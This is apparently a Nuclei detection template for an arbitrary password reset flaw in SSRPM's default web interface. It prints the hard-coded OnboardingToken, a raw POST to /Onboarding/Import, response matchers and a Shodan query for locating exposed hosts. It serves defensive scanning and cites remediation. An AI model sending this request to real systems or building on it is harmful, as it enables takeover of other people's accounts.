52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: ssrpm-arbitrary-password-reset
|
|
|
|
info:
|
|
name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
|
|
author: vince-isec
|
|
severity: high
|
|
description: |
|
|
The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
|
|
remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface.
|
|
reference:
|
|
- https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
|
|
metadata:
|
|
shodan-query: http.favicon.hash:-916902413
|
|
max-request: 1
|
|
verified: true
|
|
tags: ssrpm,intrusive
|
|
|
|
variables:
|
|
string: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /Onboarding/Import HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"ErrorCode":-55'
|
|
- '"Success":false'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- string
|
|
# digest: 4a0a00473045022050149c259ebd2c53027582dbb9a79dd703cfcfb1ca9357feae23108fe913029e022100ed0ef223ee9d627a4e6d68b56000280be279df21d258df4e07cf298191866c99:922c64590222798bb761d5b6d8e72950 |